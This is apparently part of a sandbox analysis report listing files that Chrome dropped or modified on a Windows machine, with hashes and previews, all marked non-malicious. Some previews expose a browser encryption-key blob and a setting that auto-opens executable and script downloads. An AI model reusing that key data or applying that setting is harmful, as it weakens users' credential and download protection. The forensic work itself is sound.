Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJDaHJvbWVSZWNvdmVyeS5leGUiLCJyb290X2hhc2giOiJVUTRsOWhOY3VCS21lc2Utakd2ZE52X1VCWXFTTWNpTGZQM3pxZ2tnXy0wIn0seyJwYXRoIjoibWFuaWZlc3QuanNvbiIsInJvb3RfaGFzaCI6IjBhd25UUEVCZ0NEeTJXTmFVWTdSb2ZJY3dzdnA0cVE1THNlUzFVdGJVdjQifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJmcGplb2FkbWdlZGFqcGxtcG9hYWprY2hkb2ZjbHBrZiIsIml0ZW1fdmVyc2lvbiI6IjEuMy4zNi4xNDEiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"ef1pxaTj-_-MaYe95eLdI4WHEPJq4PB7n1seVNh9AxlAGhDeKZD2PDPdzEYwLEXP6d3DCgNBaZDMZeByzQbRob9fSKBwHKzITZC0ScxWJTc8DuWlYfQdRMTrzxr_7S1FVvRx4Fxi7FFg921RIa7d2zXCGnA8qIvfUzYBU0TYoMeo--GC5JmJGpwrDi_9Xq0saxXUViu8o7Vlbul2ZEFLNMpHSfafBFLJVD_0cJc5arSdhdEVdAW1MztVSQ8CFfKhci2LBn3fKihN2_klwBKfbfmzKNm5aLoOf_iG3hjIoLji8dcxYo5sYXugJENpRrs-_AclQKykKKuD8wi45RK

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\manifest.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	195
Entropy (8bit):	4.682333395896383
Encrypted:	false
SSDEEP:	3:rR6TAulhFphifFJ9LAG9Xg0XTFHqS1wP/pEeSWU4pv/8F/FxLj2RF2fcTZTotL:F6VlM90ggITgS1wnuWfB0NpK4aotL
MD5:	7A8E3A0B6417948DF4D49F3915428D7A
SHA1:	4FC084AABDB13483567D5C417C7ED8FD16726A80
SHA-256:	D1AC274CF1018020F2D9635A518ED1A1F21CC2CBE9E2A4392EC792D54B5B52FE
SHA-512:	064D84A57B28C19AD10742859DA493D0826B47ADC632F6C623DFB4DE36D72A9D29BE98518061A9FFD42D99FCF01F27DE39CE74782B3A5ACBBE11DFDDEEAB59A1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{. "manifest_version": 2,. "name": "ImprovedRecoveryComponentInner",. "version": "1.3.36.141",. "imageName": "image.squash",. "squash": true,. "fsType": "squashfs",. "isRemovable": false.}

C:\Users\user\AppData\Local\Google\Chrome\User Data\1636aa9d-3111-4a5c-843c-94249e78b200.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	207994
Entropy (8bit):	6.072256637605032
Encrypted:	false
SSDEEP:	6144:FU03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:FnCW8D2FmvoL
MD5:	801FC8D6CC0A7EBD956E86300E250E47
SHA1:	BEEB2ADDEAEAA305ED93C096AF63DA047EB9E7AA
SHA-256:	A61923AC1B2536A7B194903506F5457A6831D472A605BCB833653D6BF390D63D
SHA-512:	0D535722BD551A045BBFBD81CC96DF3F0252B9E2DD1ACB7BF1AC1C41072A892DB3D0E1D6294C7FFAC6B555716946110FD09740CCB2F51D8D10D6067E0998862F
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245922715401452"},"plugins":{"metadata":{"adobe-flash-player":{"d

C:\Users\user\AppData\Local\Google\Chrome\User Data\4f00f4dd-4d61-4a8f-a33c-d99f5834a4dd.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	199748
Entropy (8bit):	6.0448124575828155
Encrypted:	false
SSDEEP:	6144:q03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:VCW8D2FmvoL
MD5:	E60DFC6596AD4631983715C4A3CEE81B
SHA1:	C7B33855C3A64BE8D464586EAD7B146002C64043
SHA-256:	F52BB3FF9E9536A4BD26066BBB3E84D299D4FBFAED2A062A2B62128663F323B3
SHA-512:	D8AA2F3E04A2E573BCDD994A853EC358CE2ABC62D5A82513CA7926BAE64EF72228ECF95BA21FE6C73CAC43943C04DCA5D9B1C7411B9F3E812F996BE66628FE3E
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d

C:\Users\user\AppData\Local\Google\Chrome\User Data\5c74f169-4077-46da-8357-ae9c63af9761.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	199645
Entropy (8bit):	6.044540100232156
Encrypted:	false
SSDEEP:	6144:y03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:9CW8D2FmvoL
MD5:	DBBBDCB7A4EC0FD857BBAC7314921BAD
SHA1:	BA35AA951DC9EEFED613BE5555E4D5E0451859B8
SHA-256:	3E6DCBB0EB676F58C644DC7FD22AC795C6E6B4C313FDC00AF364612BC90F06A7
SHA-512:	81B3CFCA7B3A4876C876ACCF689ED67036E6F47DDDD42FF435010A1C9417717398413A1692B91DD0305E8C75BEA84FE1D56635C6A64ECFCB2B77B0FC86316F34
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d

C:\Users\user\AppData\Local\Google\Chrome\User Data\646b25b4-9e2a-466d-a8b1-89001cded742.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	207994
Entropy (8bit):	6.072254559988753
Encrypted:	false
SSDEEP:	6144:co03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:c7CW8D2FmvoL
MD5:	3CFA9F1C33D6AC2C2E97F6DBD4F9658A
SHA1:	731DEF14B8D5E7B97A187B9C678056AE1C7E83C4
SHA-256:	F105D920599551975F0BC5FEF6D12D9EC8C86BFEFEFC4BB1493FD9EB987DAB19
SHA-512:	759F25BD0B16D9BD1A26A3FF21A4B2C933C04C9982A537D9B70DDC2A42BFA512C54E3BF583728405F120F3B9E4143F0C1A46B7EE52D833F917A6A2678DA2C80C
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d

C:\Users\user\AppData\Local\Google\Chrome\User Data\78810434-2722-4012-abaa-07d79d32a1eb.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	101472
Entropy (8bit):	3.750555934697916
Encrypted:	false
SSDEEP:	384:WDN2icDtD2c7ClN+r7vSEr3Baw5HUtGFMrX7aFberxmASI4srrT2mP7F30GGK1OL:2y1pCwQhcerj5UklPzOmKgqy5+
MD5:	8861B480816CFF914C2C00518E1E1C09
SHA1:	A77536EBF40CABC12A9612B6591C9712A3DB686B
SHA-256:	2AA0D5D60E5CC37623EA71A91641910AF5C0F419A9AC2E864738BC465CBA64C8
SHA-512:	412F1FF970CB109118E0721CC168C64FE79699A50ECCAEE47B857D257794DD44BFFD9C7389BD8C03F57BBA949FFD0D186BAC77B4F0A9509E6624E7AC1BE9687C
Malicious:	false
Preview:	\..................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....^8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

C:\Users\user\AppData\Local\Google\Chrome\User Data\92355d72-a90c-4b7b-bc8c-2ba970f452bc.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	93504
Entropy (8bit):	3.750083187912697
Encrypted:	false
SSDEEP:	384:nDN2icDtcc7ClN+r7vSa3Baw5HUtGFMrXkiExZI4srrT2mP030GGK1OwEGNb12fG:byVpCg1hceL4UkQPzOmKgqy5H
MD5:	F924BA2622816FE209F613DC017F65C1
SHA1:	AF5DD8C7CFCD6A22E498DC05E7858AD4C43D10DD
SHA-256:	FA3B34E516CA700CDFA53C1ECCF34A18222637B740F211A98BE701AA94618D3B
SHA-512:	82113A6CC977B710B535925B2DFE3ABF11B699BD00C1C1A5423CE8C006D7103DF28B3847E6BAED05017AE234A6350C0A255D6C08477BA4A2937A9E17EEF83A28
Malicious:	false
Preview:	<m.................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....^8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	3.3041625260016576
Encrypted:	false
SSDEEP:	3:FkXwgs0oRLn:+taRLn
MD5:	7AE9008C2AA5ED3E5ED52743E082F5BF
SHA1:	CD90099842F51474494BFC490433578A89C1B539
SHA-256:	94E7D9BF431A0E3F0FD02F0FBA7321F43DD8B523E3D32092AFC474D3FD5ABF62
SHA-512:	596E66D10186ADAD552F4CF7E74CD438AD19AF4C30950D2D6EB80E9F9430CA475D12BB79423EC8D15EAF37ABE0AD1DCCAE459C356A00055A82155C24A35C6F14
Malicious:	false
Preview:	sdPC.....................UO..E.D.Q.o....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\0168d31b-89b6-4dd6-8f26-9bb9f3352779.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4899
Entropy (8bit):	4.935931533909383
Encrypted:	false
SSDEEP:	48:Yc1kKSChkliFqARiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzFen:nVLK61pIKI95k0JCKL8bbOTlVuHn
MD5:	049739E195E83C219E1C7C39F7E074A4
SHA1:	A3C132A7398223DBD1D653C11F68877A3950A7BC
SHA-256:	DF8621B9883E4723107312D2697F69B5408347D9C9A386ED8914395AF165C8C2
SHA-512:	7AB1F16D98BFAC5E43975F13ED63FE86B30FD10583F7D8976F069989D3B6F2B7F025A49869831DDC799EC2ECC270AEF1C48FDD1BF7F431CEDCB11D6E5D60D76E
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_recei

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\07ece42e-0bcb-44f9-922c-b49f9471e5ae.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	1518
Entropy (8bit):	4.8062213955365065
Encrypted:	false
SSDEEP:	24:Y26aL3M33ayFGRaXa63aDaaraqavatZa+RdsdydR/RdsdrJdMHQmQYhbG7n/iy:Y2nzM3qyvK6qDHGXCtwWs+RLs9zMHSYm
MD5:	10E45841166C3E8A4EC4EC7640B300FF
SHA1:	F57A740BB8FE6979AD50DB1A587B3AD06240CCA9
SHA-256:	3CF57024965FD1EA05D3AC849FF5538CBECC6086382F9825CC9345261C325C31
SHA-512:	27BF5F7B7D5457EE5BF1977B04E0FFCA941832518CECA65DD07F94CEC93E75B018432E6389CFAB582D7019BC57A15FEBB7C02BC78307DA711476259592EC82D0
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"isolation":[],"server":"https://redirector.gvt1.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expi

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\086bb8f0-72ec-4e10-add1-7448defa4df3.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\1a82ff71-aec4-4559-9204-4e9cb29a979e.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4899
Entropy (8bit):	4.9374220871086525
Encrypted:	false
SSDEEP:	48:Yc1kKSChkli2qAOiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzFen:nVLFt1pIKI95k0JCKL8bbOTlVuHn
MD5:	28A9342C8118982B560CE098526B7976
SHA1:	A779DB4CD7CF16245C5361EAD894BA8714EEBBF0
SHA-256:	852090A12063898D319F4E530617EC661F390EC9991F5F30C5F5A4C06EF30196
SHA-512:	C10EF54CA437C793AA314EDFA2F0883225ADCD51987D058CFE5BA008F67A1CC76873B542334BAEE329196DC9AAFCE8A0C83EC7570FB5F6839AAFF0A484261773
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_recei

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\22684be1-e6cb-4b2d-98bd-b59a8fa29d34.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4899
Entropy (8bit):	4.935931533909383
Encrypted:	false
SSDEEP:	48:Yc1kKSChkliFqARiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzFen:nVLK61pIKI95k0JCKL8bbOTlVuHn
MD5:	049739E195E83C219E1C7C39F7E074A4
SHA1:	A3C132A7398223DBD1D653C11F68877A3950A7BC
SHA-256:	DF8621B9883E4723107312D2697F69B5408347D9C9A386ED8914395AF165C8C2
SHA-512:	7AB1F16D98BFAC5E43975F13ED63FE86B30FD10583F7D8976F069989D3B6F2B7F025A49869831DDC799EC2ECC270AEF1C48FDD1BF7F431CEDCB11D6E5D60D76E
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_recei

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\39eda3ed-a8ec-43b7-a6a7-fbea533e1abe.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	19796
Entropy (8bit):	5.56403969144979
Encrypted:	false
SSDEEP:	384:RoXt3LlxpXG1kXqKf/pUZNCgVLH2HfDyrUNHGklcr74N:SLlzG1kXqKf/pUZNCgVLH2Hf+rUxGPrC
MD5:	3B8502763C8797C9F82879D19CA25C05
SHA1:	7DEA9EF8991F6C38FE35872467908ED67EEA59B8
SHA-256:	7254F796D96C27FD2170398D970CE97AA7959375225D7B0D63573DBCFBB0A0D9
SHA-512:	DCE5BA9E77EC4789D09C3AC67C1C6AF442A2D17719AA43A922A481201E759062CF4DDF0A07A257012A55363AF75BEB164F7753E32585AF7B3EDCD80F615896AE
Malicious:	false
Preview:	{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13298721014497197","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\3a53e226-65a9-4b7e-aa39-1bea417fdacb.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	17356
Entropy (8bit):	5.571100573142189
Encrypted:	false
SSDEEP:	384:RoXteLlxpXG1kXqKf/pUZNCgVLH2HfDyrUMlu74Ld:pLlzG1kXqKf/pUZNCgVLH2Hf+rUj7i
MD5:	94B36F5944C261AEBF7464E208234C0C
SHA1:	663F662AB2776CD73DE7BD8E991D587745CE6DC8
SHA-256:	04ED689A4F7E40C76E18BAE522540957CDC23F01CFB5C8078D474199DD31444D
SHA-512:	C5D2385133076908DD2A0C9BA23F498381FB989E3DDF29ADC15D804B8D12DB80F7F04933011A649ACDBCC9207485A27BD5E6B929057E4A12E293C471E0CF0F6E
Malicious:	false
Preview:	{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13298721014497197","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9f33b41f-c991-42da-83f3-c8e35c941eae.tmp

